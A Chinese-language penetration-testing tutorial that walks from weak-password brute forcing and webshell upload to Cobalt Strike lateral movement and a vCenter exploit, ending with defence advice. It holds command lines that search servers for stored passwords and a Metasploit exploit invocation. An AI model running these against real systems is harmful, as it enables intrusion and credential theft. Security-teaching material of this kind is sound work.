从弱口令到内网渗透实战教学文档

一、前期信息收集与打点

1.1 资产发现方法

• ICP备案查询：通过"ICP/IP地址/域名信息备案管理系统"查询目标单位备案域名

  • 查询地址：https://beian.miit.gov.cn/
  • 需要准确知道单位名称
  • 可获取已备案的网站域名

• 子域名扫描：

  • 使用多种子域名扫描工具（如OneForAll、Sublist3r等）
  • 推荐在线工具：https://phpinfo.me/domain/
  • 判断域名解析IP归属地，确认是否为自有资产

1.2 弱口令利用

1. 账号枚举：

   • 通过网站源码分析用户名格式（如4位数字）
   • 利用系统漏洞枚举出有效账号

2. 密码破解：

   • 使用Burp Suite加载字典进行暴力破解
   • 发现特殊密码：!@#$%^&*()
   • 注意：浏览器可能自动编码特殊字符，需通过Burp抓包替换原始密码

3. 登录后利用：

   • 寻找上传点（如新建配置信息功能）
   • 上传Webshell（如冰蝎马）
   • 检查服务器权限（IIS权限）、出网情况、杀毒软件

1.3 服务器信息收集

• 查找配置文件：

  # Linux
  find / -regextype posix-extended -regex ".*\.(properties|xml|cnf|yaml|ini)" | xargs egrep -i "pass|pwd|jdbc"
  
  # Windows
  find /s /i "password" *.properties
  

• 发现额外信息：

  • 数据库连接账号密码
  • 其他网段信息
  • 使用Cobalt Strike(CS)读取服务器账号密码

二、内网横向移动

2.1 SMB Beacon使用

• 特点：

  • 使用命名管道通信
  • 流量封装于SMB协议中，隐蔽性强
  • 可绕过部分防护设备

• 操作步骤：

  1. 扫描445端口（portscan或net view）
  2. 利用psexec模块登录其他主机
  3. 进行Token窃取（steal token）

2.2 内网扫描与发现

• 使用工具：fscan等内网扫描工具
• 发现内容：
  • 多台相同密码服务器
  • 安全设备（网神入侵防御系统、深信服产品）
  • vCenter服务器

2.3 vCenter漏洞利用

• 利用漏洞：

  • CVE-2021-21975
  • CVE-2021-21983

• MSF利用模块：

  use exploit/linux/http/vmware_vrops_mgr_ssrf_rce
  set rhosts xx.xx.xx.xx
  set lhost xx.xx.xx.xx
  run
  

• 漏洞原理：

  1. 通过SSRF泄露admin凭据
  2. 覆盖"admin.properties"文件
  3. 重置vCenter密码

2.4 内网扩展

• 发现新网段：
  • 通过zabbix配置文件发现60.x网段
  • 发现多个数据库
  • 数据防泄露系统
  • 办公网段（含打印机）

三、关键技巧总结

1. 信息收集：

   • 全面收集资产信息（备案、子域名）
   • 服务器文件仔细检查（可能包含密码本、新网段）

2. 弱口令利用：

   • 注意特殊字符编码问题
   • 尝试默认密码

3. 内网横向：

   • 善用SMB Beacon等隐蔽通道
   • 利用已有漏洞（如vCenter漏洞）

4. 持续发现：

   • 通过配置文件发现新资产
   • 利用已有权限进行深度渗透

四、防御建议

1. 密码策略：

   • 禁用默认密码
   • 强制使用复杂密码
   • 定期更换密码

2. 漏洞管理：

   • 及时修补已知漏洞（如vCenter漏洞）
   • 限制上传功能

3. 内网防护：

   • 网络分段隔离
   • 监控异常SMB流量
   • 限制横向移动

4. 日志监控：

   • 监控暴力破解行为
   • 记录配置文件访问

本教学文档完整还原了从外网弱口令到内网渗透的全过程，重点突出了信息收集、弱口令利用、内网横向移动等关键环节的技术细节，可作为渗透测试实战参考。